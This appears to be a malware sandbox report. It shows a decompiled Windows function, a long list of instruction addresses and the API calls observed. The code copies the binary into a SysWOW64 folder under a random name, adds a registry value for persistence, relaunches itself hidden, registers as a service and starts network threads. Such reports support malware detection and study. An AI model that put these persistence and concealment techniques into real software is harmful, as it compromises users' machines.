					_t250 = E0012EE95(_a12, E00122544(0x1322f8, 0x130a48, 4, 0xe4, 0xc8));
					_t454 = 0x100;
					_v8 = _t250;
					E0012EE2A(_t438, 0x1322f8, 0, 0x100);
					_t467 = _t465 + 0x28;
					if(_v8 == 0) {
						_t257 = E001296AA( &_v672,  &_v48,  &_v44,  &_v372,  &_v112);
						_t467 = _t467 + 0x14;
						_v16 = _t257;
						if(_t257 == 0) {
							E0012EF00("C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe",  &_v672);
							_pop(_t438);
							_a12 = GetCommandLineA();
							_v8 = E0012EE95(_a12, E00122544(0x1322f8, 0x130a38, 4, 0xe4, 0xc8));
							E0012EE2A(_t438, 0x1322f8, 0, 0x100);
							_t468 = _t467 + 0x28;
							__eflags = _v8;
							if(_v8 == 0) {
								L102:
								_v8 = E0012EE95(_a12, E00122544(_t459, 0x130a28, 4, 0xe4, 0xc8));
								E0012EE2A(_t438, _t459, 0, _t454);
								_t467 = _t468 + 0x28;
								__eflags = _v8;
								if(_v8 == 0) {
									L110:
									_t267 = E00126EC3();
									__eflags = _t267;
									if(_t267 != 0) {
										E001298F2(_t438);
										L19:
										ExitProcess(0);
									}
									__eflags = _v372;
									if(_v372 == 0) {
										L116:
										 *0x1333b0 = 0;
										L117:
										_v64.hProcess =  &_v372;
										_v64.hThread = E00129961;
										_v64.dwProcessId = 0;
										_v64.dwThreadId = 0;
										StartServiceCtrlDispatcherA( &_v64);
										goto L19;
									}
									_t272 =  &_v372;
									_t449 = _t272 + 1;
									do {
										_t438 =  *_t272;
										_t272 = _t272 + 1;
										__eflags = _t438;
									} while (_t438 != 0);
									__eflags = _t272 - _t449 - 0x20;
									if(_t272 - _t449 >= 0x20) {
										goto L116;
									}
									E0012EF00("htdzdeug",  &_v372);
									_pop(_t438);
									goto L117;
								}
								_t459 = _v8 + 3;
								_t276 = E0012ED03(_t459, 0x20);
								_pop(_t438);
								__eflags = _t276;
								if(_t276 != 0) {
									L107:
									_t454 = _t276 - _t459;
									__eflags = _t454 - 0x20;
									if(_t454 >= 0x20) {
										_t454 = 0x1f;
									}
									E0012EE08(0x132184, _t459, _t454);
									_t467 = _t467 + 0xc;
									 *((char*)(_t454 + 0x132184)) = 0;
									goto L110;
								}
								_t279 = _t459;
								_t449 = _t279 + 1;
								do {
									_t438 =  *_t279;
									_t279 = _t279 + 1;
									__eflags = _t438;
								} while (_t438 != 0);
								_t276 = _t279 - _t449 + _t459;
								__eflags = _t276;
								goto L107;
							}
							_t282 = _v8 + 3;
							_v672 = 0;
							__eflags =  *_t282 - 0x22;
							_v20 = _t282;
							if( *_t282 != 0x22) {
								_t283 = E0012ED03(_v20, 0x20);
								_pop(_t438);
								__eflags = _t283;
								if(_t283 == 0) {
									_t283 =  &(_a12[lstrlenA(_a12)]);
									__eflags = _t283;
								}
								_t284 = _t283 - _v8;
								_v24 = _t284;
								__eflags = _t284 + 0xfffffffd;
								E0012EE08( &_v672, _v20, _t284 + 0xfffffffd);
								 *((char*)(_t464 + _v24 - 0x29f)) = 0;
								L98:
								_t468 = _t468 + 0xc;
								L99:
								__eflags = _v672;
								if(_v672 != 0) {
									E0012EE08(0x1333d8,  &_v672, 0x103);
									_t468 = _t468 + 0xc;
								}
								 *0x132cc0 = 1;
								goto L102;
							}
							_v20 = _v8 + 4;
							_t294 = E0012ED03(_v8 + 4, 0x22);
							_pop(_t438);
							__eflags = _t294;
							if(_t294 == 0) {
								goto L99;
							}
							_v24 = _t294 - _v8;
							E0012EE08( &_v672, _v20, _t294 - _v8 + 0xfffffffc);
							 *((char*)(_t464 + _v24 - 0x2a0)) = 0;
							goto L98;
						}
						_v36 = 0;
						if(_t257 >= 4 || _v48 > 0x61 && _v44 != 0) {
							L84:
							if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) != 0) {
								_t303 =  &_v672;
								if(_v672 == 0x22) {
									_t303 =  &_v671;
								}
								if(_t303[1] == 0x3a && _t303[2] == 0x5c) {
									_t303[3] = 0;
									_t304 = GetDriveTypeA(_t303);
									_t515 = _t304 - 2;
									if(_t304 != 2) {
										E00129145(_t515);
										_t438 = 1;
									}
								}
							}
							goto L19;
						} else {
							E00124280(_t438, 1);
							_pop(_t438);
							if(_v672 == 0) {
								goto L84;
							}
							_t309 = E0012675C( &_v672,  &_v12, 0);
							_t467 = _t467 + 0xc;
							_v8 = _t309;
							if(_t309 == 0 || _v12 == 0) {
								goto L84;
							} else {
								_v32 = 0;
								_v28 = 0;
								if(_v16 == 2) {
									L55:
									__eflags = _v16 - 3;
									if(_v16 >= 3) {
										L83:
										E0012EC2E(_v8);
										_pop(_t438);
										if(_v36 != 0) {
											goto L19;
										}
										goto L84;
									}
									_t312 = E00122544(_t459, 0x130a3c, 0xc, 0xe4, 0xc8);
									_t469 = _t467 + 0x14;
									__eflags = GetEnvironmentVariableA(_t312,  &_v1272, 0x1f4);
									if(__eflags == 0) {
										L82:
										E0012EE2A(_t438, _t459, 0, _t454);
										_t467 = _t469 + 0xc;
										goto L83;
									}
									_t318 = E001299D2(_t449, __eflags,  &_v1272,  &_v672,  &_v704, _v8, _v12);
									_t469 = _t469 + 0x14;
									__eflags = _t318;
									if(_t318 == 0) {
										goto L82;
									}
									E0012EE2A(_t438, _t459, 0, _t454);
									_t470 = _t469 + 0xc;
									_v1272 = 0x22;
									lstrcpyA( &_v1271,  &_v672);
									_t324 = lstrlenA( &_v1272);
									 *((char*)(_t464 + _t324 - 0x4f4)) = 0x22;
									_t325 = _t324 + 1;
									__eflags = _v16 - 2;
									_a12 = _t325;
									 *((char*)(_t464 + _t325 - 0x4f4)) = 0;
									if(_v16 != 2) {
										L60:
										_push(0);
										_push( &_v112);
										_t328 = E00126DC2(_t438) ^ 0x61616161;
										__eflags = _t328;
										_push(_t328);
										E0012F133();
										_t470 = _t470 + 0xc;
										L61:
										_t331 = E00122544(_t459,  &E001306AC, 0x2e, 0xe4, 0xc8);
										_t471 = _t470 + 0x14;
										_t332 = RegOpenKeyExA(0x80000001, _t331, 0, 0x103,  &_v24);
										_v20 = _t332;
										__eflags = _t332;
										if(_t332 == 0) {
											_t373 =  &(_a12[1]);
											__eflags = _t373;
											_v20 = RegSetValueExA(_v24,  &_v112, 0, 1,  &_v1272, _t373);
											RegCloseKey(_v24);
										}
										E0012EE2A(_t438, _t459, 0, _t454);
										E0012EE2A(_t438,  &_v772, 0, 0x44);
										_v772.cb = 0x44;
										E0012EE2A(_t438,  &_v64, 0, 0x10);
										_t469 = _t471 + 0x24;
										_t340 = GetModuleFileNameA(GetModuleHandleA(0),  &_v372, 0x104);
										__eflags = _t340;
										if(_t340 != 0) {
											__eflags = _v372 - 0x22;
											_t357 =  &_v372;
											_v40 = _t357;
											if(_v372 == 0x22) {
												_t357 =  &_v371;
												_v40 = _t357;
											}
											__eflags =  *((char*)(_t357 + 1)) - 0x3a;
											if( *((char*)(_t357 + 1)) == 0x3a) {
												__eflags =  *((char*)(_t357 + 2)) - 0x5c;
												if( *((char*)(_t357 + 2)) == 0x5c) {
													_t358 = _v40;
													_t438 = _t358[3];
													_a15 = _t358[3];
													_t358[3] = 0;
													_t359 = GetDriveTypeA(_t358);
													__eflags = _t359 - 2;
													if(_t359 != 2) {
														_t438 = _v40;
														_v40[3] = _a15;
														lstrcatA( &_v1272, E00122544(_t459, 0x130a38, 4, 0xe4, 0xc8));
														E0012EE2A(_v40, _t459, 0, _t454);
														_t469 = _t469 + 0x20;
														__eflags = _v372 - 0x22;
														if(_v372 != 0x22) {
															lstrcatA( &_v1272, "\"");
														}
														lstrcatA( &_v1272,  &_v372);
														__eflags = _v372 - 0x22;
														if(_v372 != 0x22) {
															lstrcatA( &_v1272, "\"");
														}
														_v36 = 1;
													}
												}
											}
										}
										__eflags = _v32;
										if(_v32 != 0) {
											__eflags = _v28;
											if(_v28 != 0) {
												wsprintfA( &_v372, "%X%08X", _v28, _v32);
												lstrcatA( &_v1272, E00122544(_t459, 0x130a28, 4, 0xe4, 0xc8));
												E0012EE2A(_t438, _t459, 0, _t454);
												_t469 = _t469 + 0x30;
												lstrcatA( &_v1272,  &_v372);
											}
										}
										_t344 = CreateProcessA(0,  &_v1272, 0, 0, 0, 0x8000000, 0, 0,  &_v772,  &_v64);
										__eflags = _t344;
										if(_t344 == 0) {
											DeleteFileA( &_v672);
											_v36 = 0;
										}
										__eflags = _v16 - 1;
										if(_v16 == 1) {
											__eflags = _v20;
											if(_v20 == 0) {
												E001296FF(_t438);
											}
										}
										goto L82;
									}
									__eflags = _v112;
									if(_v112 != 0) {
										goto L61;
									}
									goto L60;
								}
								_t379 = GetTempPathA(0x1f4,  &_v1272);
								_t494 = _t379;
								if(_t379 == 0) {
									goto L55;
								}
								_t383 = E001299D2(_t449, _t494,  &_v1272,  &_v672,  &_v704, _v8, _v12);
								_t467 = _t467 + 0x14;
								if(_t383 == 0) {
									goto L55;
								}
								_v80 = 0;
								if(_v16 < 3 || _v372 == 0) {
									_push(0);
									_push( &_v80);
									_push(E00126DC2(_t438) ^ 0x61616161);
									E0012F133();
									_t474 = _t467 + 0xc;
									lstrcpyA( &_v372, E00126CC9(_t438));
									lstrcatA( &_v372,  &_v80);
									lstrcatA( &_v372,  &E0013070C);
									_t396 = 0;
									__eflags = 0;
									goto L43;
								} else {
									_t410 =  &_v372;
									_t450 = _t410 + 1;
									do {
										_t441 =  *_t410;
										_t410 = _t410 + 1;
									} while (_t441 != 0);
									_t411 = _t410 - _t450;
									if(_t411 > 0 &&  *((char*)(_t464 + _t411 - 0x171)) == 0x5c) {
										_t411 = _t411 - 1;
									}
									_t451 = _t411;
									if(_t411 <= 0) {
										L41:
										_t449 = _t451 - _t411;
										_a12 = _t451 - _t411;
										E0012EE08( &_v80, _t464 + _t411 - 0x170, _t451 - _t411);
										 *((char*)(_t464 + _a12 - 0x4c)) = 0;
										_t474 = _t467 + 0xc;
										_t396 = 1;
										L43:
										if(_v44 == 0 || _v48 < 0x50) {
											_t438 = 1;
											__eflags = 1;
										} else {
											_t438 = 0;
										}
										_push(_t438);
										_push(_t396);
										_push( &_v372);
										_push( &_v80);
										_push( &_v672);
										_push( &_v704);
										_t401 = E00129326(_t438, _t449);
										_t467 = _t474 + 0x18;
										if(_t401 == 0) {
											_t402 =  *0x13217c; // 0x0
											_v32 = _t402;
											_t403 =  *0x132180; // 0x0
											goto L54;
										} else {
											if(GetFileAttributesExA( &_v672, 0,  &(_v772.dwXCountChars)) != 0) {
												_t403 = 0x61040108;
												 *0x132180 = 0x61040108;
												 *0x13217c = 0;
												_v32 = 0;
												L54:
												_v28 = _t403;
												DeleteFileA( &_v672);
												goto L55;
											}
											_t459 = 1;
											if(_v16 == 1) {
												E001296FF(_t438);
											}
											_v36 = _t459;
											goto L83;
										}
									} else {
										_t442 =  &_v372;
										while( *((char*)(_t442 + _t411 - 1)) != 0x5c) {
											_t411 = _t411 - 1;
											if(_t411 > 0) {
												continue;
											}
											goto L41;
										}
										goto L41;
									}
								}
							}
						}
					}
					_t417 = _v8;
					_t454 = _t417 + 3;
					_v372 = 0;
					if( *((char*)(_t417 + 3)) != 0x22) {
						_t418 = E0012ED03(_t454, 0x20);
						_pop(_t438);
						__eflags = _t418;
						if(_t418 == 0) {
							_t418 =  &(_a12[lstrlenA(_a12)]);
							__eflags = _t418;
						}
						_t459 = _t418 - _v8;
						__eflags = _t459;
						E0012EE08( &_v372, _t454, _t459 - 3);
						 *((char*)(_t464 + _t459 - 0x173)) = 0;
						L13:
						_t467 = _t467 + 0xc;
						L14:
						if(_v372 != 0 && _v672 != 0) {
							_t424 = E0012675C( &_v672,  &_v12, 0);
							_t467 = _t467 + 0xc;
							if(_t424 != 0 && _v12 != 0) {
								_t426 = E00126A60(_t449,  &_v372, _t424, _v12);
								_t467 = _t467 + 0xc;
								_v12 = _t426;
							}
						}
						goto L19;
					}
					_t454 = _t417 + 4;
					_t428 = E0012ED03(_t417 + 4, 0x22);
					_pop(_t438);
					if(_t428 == 0) {
						goto L14;
					} else {
						_t459 = _t428 - _v8;
						E0012EE08( &_v372, _t454, _t459 - 4);
						 *((char*)(_t464 + _t459 - 0x174)) = 0;
						goto L13;
					}
				}
			}





















































































                                                                                0x00129a7f
                                                                                0x00129a83
                                                                                0x00129a8a
                                                                                0x00129a90
                                                                                0x00129a97
                                                                                0x00129a9d
                                                                                0x0012a3cc
                                                                                0x0012a3d2
                                                                                0x0012a41c
                                                                                0x0012a42c
                                                                                0x0012a43a
                                                                                0x0012a440
                                                                                0x0012a448
                                                                                0x0012a452
                                                                                0x0012a45a
                                                                                0x0012a469
                                                                                0x0012a46b
                                                                                0x0012a470
                                                                                0x0012a475
                                                                                0x0012a47a
                                                                                0x0012a48a
                                                                                0x0012a48c
                                                                                0x0012a497
                                                                                0x0012a497
                                                                                0x0012a49d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a49f
                                                                                0x0012a4a7
                                                                                0x0012a4ac
                                                                                0x0012a4be
                                                                                0x0012a4c3
                                                                                0x00000000
                                                                                0x0012a4c3
                                                                                0x0012a4ae
                                                                                0x0012a4ae
                                                                                0x0012a4b3
                                                                                0x0012a4b5
                                                                                0x0012a4b9
                                                                                0x0012a4b9
                                                                                0x00000000
                                                                                0x0012a4b5
                                                                                0x0012a497
                                                                                0x0012a3da
                                                                                0x0012a406
                                                                                0x0012a407
                                                                                0x0012a409
                                                                                0x0012a40b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a3e8
                                                                                0x0012a3eb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a3ed
                                                                                0x0012a3f3
                                                                                0x0012a3f6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a3f8
                                                                                0x0012a3f8
                                                                                0x0012a3f8
                                                                                0x0012a400
                                                                                0x0012a400
                                                                                0x0012a414
                                                                                0x0012a419
                                                                                0x00000000
                                                                                0x00129aa3
                                                                                0x00129ab0
                                                                                0x00129ac2
                                                                                0x00129ac4
                                                                                0x00129ac4
                                                                                0x00129ad1
                                                                                0x00129ae1
                                                                                0x00129aef
                                                                                0x00129af4
                                                                                0x00129af9
                                                                                0x00129afb
                                                                                0x00129afb
                                                                                0x00129af9
                                                                                0x00129afd
                                                                                0x00129b14
                                                                                0x00129b1a
                                                                                0x00129b26
                                                                                0x00129b2b
                                                                                0x00129b33
                                                                                0x00129b36
                                                                                0x00129b3b
                                                                                0x00129b41
                                                                                0x00129c26
                                                                                0x00129c2b
                                                                                0x00129c2e
                                                                                0x00129c33
                                                                                0x0012a1de
                                                                                0x0012a1e4
                                                                                0x0012a1fd
                                                                                0x0012a211
                                                                                0x0012a214
                                                                                0x0012a219
                                                                                0x0012a21c
                                                                                0x0012a21f
                                                                                0x0012a2e2
                                                                                0x0012a305
                                                                                0x0012a308
                                                                                0x0012a30d
                                                                                0x0012a310
                                                                                0x0012a313
                                                                                0x0012a35a
                                                                                0x0012a35a
                                                                                0x0012a35f
                                                                                0x0012a361
                                                                                0x0012a3c2
                                                                                0x00129c05
                                                                                0x00129c06
                                                                                0x00129c06
                                                                                0x0012a363
                                                                                0x0012a369
                                                                                0x0012a397
                                                                                0x0012a397
                                                                                0x0012a39d
                                                                                0x0012a3a3
                                                                                0x0012a3aa
                                                                                0x0012a3b1
                                                                                0x0012a3b4
                                                                                0x0012a3b7
                                                                                0x00000000
                                                                                0x0012a3b7
                                                                                0x0012a36b
                                                                                0x0012a371
                                                                                0x0012a374
                                                                                0x0012a374
                                                                                0x0012a376
                                                                                0x0012a377
                                                                                0x0012a377
                                                                                0x0012a37d
                                                                                0x0012a380
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a38e
                                                                                0x0012a394
                                                                                0x00000000
                                                                                0x0012a394
                                                                                0x0012a318
                                                                                0x0012a31e
                                                                                0x0012a324
                                                                                0x0012a325
                                                                                0x0012a327
                                                                                0x0012a339
                                                                                0x0012a33b
                                                                                0x0012a33d
                                                                                0x0012a340
                                                                                0x0012a344
                                                                                0x0012a344
                                                                                0x0012a34c
                                                                                0x0012a351
                                                                                0x0012a354
                                                                                0x00000000
                                                                                0x0012a354
                                                                                0x0012a329
                                                                                0x0012a32b
                                                                                0x0012a32e
                                                                                0x0012a32e
                                                                                0x0012a330
                                                                                0x0012a331
                                                                                0x0012a331
                                                                                0x0012a337
                                                                                0x0012a337
                                                                                0x00000000
                                                                                0x0012a337
                                                                                0x0012a228
                                                                                0x0012a22b
                                                                                0x0012a231
                                                                                0x0012a234
                                                                                0x0012a237
                                                                                0x0012a27a
                                                                                0x0012a280
                                                                                0x0012a281
                                                                                0x0012a283
                                                                                0x0012a28e
                                                                                0x0012a28e
                                                                                0x0012a28e
                                                                                0x0012a291
                                                                                0x0012a294
                                                                                0x0012a297
                                                                                0x0012a2a5
                                                                                0x0012a2ad
                                                                                0x0012a2b4
                                                                                0x0012a2b4
                                                                                0x0012a2b7
                                                                                0x0012a2b7
                                                                                0x0012a2bd
                                                                                0x0012a2d0
                                                                                0x0012a2d5
                                                                                0x0012a2d5
                                                                                0x0012a2d8
                                                                                0x00000000
                                                                                0x0012a2d8
                                                                                0x0012a242
                                                                                0x0012a245
                                                                                0x0012a24b
                                                                                0x0012a24c
                                                                                0x0012a24e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a253
                                                                                0x0012a264
                                                                                0x0012a26c
                                                                                0x00000000
                                                                                0x0012a26c
                                                                                0x00129c39
                                                                                0x00129c3f
                                                                                0x0012a167
                                                                                0x0012a183
                                                                                0x0012a190
                                                                                0x0012a196
                                                                                0x0012a198
                                                                                0x0012a198
                                                                                0x0012a1a2
                                                                                0x0012a1b3
                                                                                0x0012a1b6
                                                                                0x0012a1bc
                                                                                0x0012a1bf
                                                                                0x0012a1c7
                                                                                0x0012a1cc
                                                                                0x0012a1cc
                                                                                0x0012a1bf
                                                                                0x0012a1a2
                                                                                0x00000000
                                                                                0x00129c54
                                                                                0x00129c56
                                                                                0x00129c5b
                                                                                0x00129c62
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00129c74
                                                                                0x00129c79
                                                                                0x00129c7c
                                                                                0x00129c81
                                                                                0x00000000
                                                                                0x00129c90
                                                                                0x00129c94
                                                                                0x00129c97
                                                                                0x00129c9a
                                                                                0x00129e3e
                                                                                0x00129e3e
                                                                                0x00129e42
                                                                                0x0012a155
                                                                                0x0012a158
                                                                                0x0012a15d
                                                                                0x0012a161
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a161
                                                                                0x00129e66
                                                                                0x00129e6b
                                                                                0x00129e75
                                                                                0x00129e77
                                                                                0x0012a14a
                                                                                0x0012a14d
                                                                                0x0012a152
                                                                                0x00000000
                                                                                0x0012a152
                                                                                0x00129e98
                                                                                0x00129e9d
                                                                                0x00129ea0
                                                                                0x00129ea2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00129eab
                                                                                0x00129eb0
                                                                                0x00129ec1
                                                                                0x00129ec8
                                                                                0x00129ed5
                                                                                0x00129edb
                                                                                0x00129ee3
                                                                                0x00129ee4
                                                                                0x00129ee8
                                                                                0x00129eeb
                                                                                0x00129ef2
                                                                                0x00129ef9
                                                                                0x00129efc
                                                                                0x00129efd
                                                                                0x00129f03
                                                                                0x00129f03
                                                                                0x00129f08
                                                                                0x00129f09
                                                                                0x00129f0e
                                                                                0x00129f11
                                                                                0x00129f2d
                                                                                0x00129f32
                                                                                0x00129f3b
                                                                                0x00129f41
                                                                                0x00129f44
                                                                                0x00129f46
                                                                                0x00129f4b
                                                                                0x00129f4b
                                                                                0x00129f67
                                                                                0x00129f6a
                                                                                0x00129f6a
                                                                                0x00129f73
                                                                                0x00129f82
                                                                                0x00129f8e
                                                                                0x00129f98
                                                                                0x00129f9d
                                                                                0x00129fb4
                                                                                0x00129fba
                                                                                0x00129fbc
                                                                                0x00129fc2
                                                                                0x00129fc9
                                                                                0x00129fcf
                                                                                0x00129fd2
                                                                                0x00129fd4
                                                                                0x00129fda
                                                                                0x00129fda
                                                                                0x00129fdd
                                                                                0x00129fe1
                                                                                0x00129fe7
                                                                                0x00129feb
                                                                                0x00129ff1
                                                                                0x00129ff4
                                                                                0x00129ff8
                                                                                0x00129ffb
                                                                                0x00129ffe
                                                                                0x0012a004
                                                                                0x0012a007
                                                                                0x0012a010
                                                                                0x0012a025
                                                                                0x0012a038
                                                                                0x0012a041
                                                                                0x0012a046
                                                                                0x0012a049
                                                                                0x0012a050
                                                                                0x0012a05e
                                                                                0x0012a05e
                                                                                0x0012a072
                                                                                0x0012a078
                                                                                0x0012a07f
                                                                                0x0012a08d
                                                                                0x0012a08d
                                                                                0x0012a093
                                                                                0x0012a093
                                                                                0x0012a007
                                                                                0x00129feb
                                                                                0x00129fe1
                                                                                0x0012a09a
                                                                                0x0012a09d
                                                                                0x0012a09f
                                                                                0x0012a0a2
                                                                                0x0012a0b6
                                                                                0x0012a0de
                                                                                0x0012a0e7
                                                                                0x0012a0ec
                                                                                0x0012a0fd
                                                                                0x0012a0fd
                                                                                0x0012a0a2
                                                                                0x0012a120
                                                                                0x0012a126
                                                                                0x0012a128
                                                                                0x0012a131
                                                                                0x0012a137
                                                                                0x0012a137
                                                                                0x0012a13a
                                                                                0x0012a13e
                                                                                0x0012a140
                                                                                0x0012a143
                                                                                0x0012a145
                                                                                0x0012a145
                                                                                0x0012a143
                                                                                0x00000000
                                                                                0x0012a13e
                                                                                0x00129ef4
                                                                                0x00129ef7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00129ef7
                                                                                0x00129cac
                                                                                0x00129cb2
                                                                                0x00129cb4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00129cd5
                                                                                0x00129cda
                                                                                0x00129cdf
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00129ce9
                                                                                0x00129cec
                                                                                0x00129d58
                                                                                0x00129d59
                                                                                0x00129d64
                                                                                0x00129d65
                                                                                0x00129d6a
                                                                                0x00129d7a
                                                                                0x00129d8b
                                                                                0x00129d9d
                                                                                0x00129da3
                                                                                0x00129da3
                                                                                0x00000000
                                                                                0x00129cf6
                                                                                0x00129cf6
                                                                                0x00129cfc
                                                                                0x00129cff
                                                                                0x00129cff
                                                                                0x00129d01
                                                                                0x00129d02
                                                                                0x00129d06
                                                                                0x00129d0a
                                                                                0x00129d16
                                                                                0x00129d16
                                                                                0x00129d17
                                                                                0x00129d1b
                                                                                0x00129d2f
                                                                                0x00129d2f
                                                                                0x00129d3e
                                                                                0x00129d41
                                                                                0x00129d49
                                                                                0x00129d4f
                                                                                0x00129d52
                                                                                0x00129da5
                                                                                0x00129da8
                                                                                0x00129db6
                                                                                0x00129db6
                                                                                0x00129db0
                                                                                0x00129db0
                                                                                0x00129db0
                                                                                0x00129db7
                                                                                0x00129db8
                                                                                0x00129dbf
                                                                                0x00129dc3
                                                                                0x00129dca
                                                                                0x00129dd1
                                                                                0x00129dd2
                                                                                0x00129dd7
                                                                                0x00129ddc
                                                                                0x00129e21
                                                                                0x00129e26
                                                                                0x00129e29
                                                                                0x00000000
                                                                                0x00129dde
                                                                                0x00129df5
                                                                                0x00129e0c
                                                                                0x00129e11
                                                                                0x00129e16
                                                                                0x00129e1c
                                                                                0x00129e2e
                                                                                0x00129e2e
                                                                                0x00129e38
                                                                                0x00000000
                                                                                0x00129e38
                                                                                0x00129df9
                                                                                0x00129dfd
                                                                                0x00129dff
                                                                                0x00129dff
                                                                                0x00129e04
                                                                                0x00000000
                                                                                0x00129e04
                                                                                0x00129d1d
                                                                                0x00129d1d
                                                                                0x00129d23
                                                                                0x00129d2a
                                                                                0x00129d2d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00129d2d
                                                                                0x00000000
                                                                                0x00129d23
                                                                                0x00129d1b
                                                                                0x00129cec
                                                                                0x00129c81
                                                                                0x00129c3f
                                                                                0x00129b47
                                                                                0x00129b4a
                                                                                0x00129b4d
                                                                                0x00129b56
                                                                                0x00129b8b
                                                                                0x00129b91
                                                                                0x00129b92
                                                                                0x00129b94
                                                                                0x00129b9f
                                                                                0x00129b9f
                                                                                0x00129b9f
                                                                                0x00129ba4
                                                                                0x00129ba4
                                                                                0x00129bb3
                                                                                0x00129bb8
                                                                                0x00129bbf
                                                                                0x00129bbf
                                                                                0x00129bc2
                                                                                0x00129bc8
                                                                                0x00129bde
                                                                                0x00129be3
                                                                                0x00129be8
                                                                                0x00129bfa
                                                                                0x00129bff
                                                                                0x00129c02
                                                                                0x00129c02
                                                                                0x00129be8
                                                                                0x00000000
                                                                                0x00129bc8
                                                                                0x00129b58
                                                                                0x00129b5e
                                                                                0x00129b64
                                                                                0x00129b67
                                                                                0x00000000
                                                                                0x00129b69
                                                                                0x00129b6b
                                                                                0x00129b7a
                                                                                0x00129b7f
                                                                                0x00000000
                                                                                0x00129b7f
                                                                                0x00129b67

                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000003), ref: 00129A7F
                                                                                • SetErrorMode.KERNEL32(00000003), ref: 00129A83
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00126511), ref: 00129A8A
                                                                                  • Part of subcall function 0012EC54: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0012EC5E
                                                                                  • Part of subcall function 0012EC54: GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0012EC72
                                                                                  • Part of subcall function 0012EC54: GetTickCount.KERNEL32 ref: 0012EC78
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,0000012C), ref: 00129AB3
                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 00129ABA
                                                                                • GetCommandLineA.KERNEL32 ref: 00129AFD
                                                                                • lstrlenA.KERNEL32(?), ref: 00129B99
                                                                                • ExitProcess.KERNEL32 ref: 00129C06
                                                                                • GetTempPathA.KERNEL32(000001F4,?), ref: 00129CAC
                                                                                • lstrcpyA.KERNEL32(?,00000000), ref: 00129D7A
                                                                                • lstrcatA.KERNEL32(?,?), ref: 00129D8B
                                                                                • lstrcatA.KERNEL32(?,0013070C), ref: 00129D9D
                                                                                • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 00129DED
                                                                                • DeleteFileA.KERNEL32(00000022), ref: 00129E38
                                                                                • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 00129E6F
                                                                                • lstrcpyA.KERNEL32(?,00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00129EC8
                                                                                • lstrlenA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00129ED5
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000103,?), ref: 00129F3B
                                                                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000022,?,?,?,00000000,00000103,?), ref: 00129F5E
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 00129F6A
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103), ref: 00129FAD
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00129FB4
                                                                                • GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00129FFE
                                                                                • lstrcatA.KERNEL32(00000022,00000000), ref: 0012A038
                                                                                • lstrcatA.KERNEL32(00000022,00130A34), ref: 0012A05E
                                                                                • lstrcatA.KERNEL32(00000022,00000022), ref: 0012A072
                                                                                • lstrcatA.KERNEL32(00000022,00130A34), ref: 0012A08D
                                                                                • wsprintfA.USER32 ref: 0012A0B6
                                                                                • lstrcatA.KERNEL32(00000022,00000000), ref: 0012A0DE
                                                                                • lstrcatA.KERNEL32(00000022,?), ref: 0012A0FD
                                                                                • CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 0012A120
                                                                                • DeleteFileA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 0012A131
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000022,0000012C), ref: 0012A174
                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 0012A17B
                                                                                • GetDriveTypeA.KERNEL32(00000022), ref: 0012A1B6
                                                                                • GetCommandLineA.KERNEL32 ref: 0012A1E5
                                                                                  • Part of subcall function 001299D2: lstrcpyA.KERNEL32(?,?,00000100,001322F8,00000000,?,00129E9D,?,00000022,?,?,?,?,?,?,?), ref: 001299DF
                                                                                  • Part of subcall function 001299D2: lstrcatA.KERNEL32(00000022,00000000,?,?,00129E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00129A3C
                                                                                  • Part of subcall function 001299D2: lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00129E9D,?,00000022,?,?,?), ref: 00129A52
                                                                                • lstrlenA.KERNEL32(?), ref: 0012A288
                                                                                • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0012A3B7
                                                                                • GetLastError.KERNEL32 ref: 0012A3ED
                                                                                • Sleep.KERNEL32(000003E8), ref: 0012A400
                                                                                • DeleteFileA.KERNEL32(001333D8), ref: 0012A407
                                                                                • CreateThread.KERNEL32 ref: 0012A42C
                                                                                • WSAStartup.WS2_32(00001010,?), ref: 0012A43A
                                                                                • CreateThread.KERNEL32 ref: 0012A469
                                                                                • Sleep.KERNEL32(00000BB8), ref: 0012A48A
                                                                                • GetTickCount.KERNEL32 ref: 0012A49F
                                                                                • GetTickCount.KERNEL32 ref: 0012A4B7
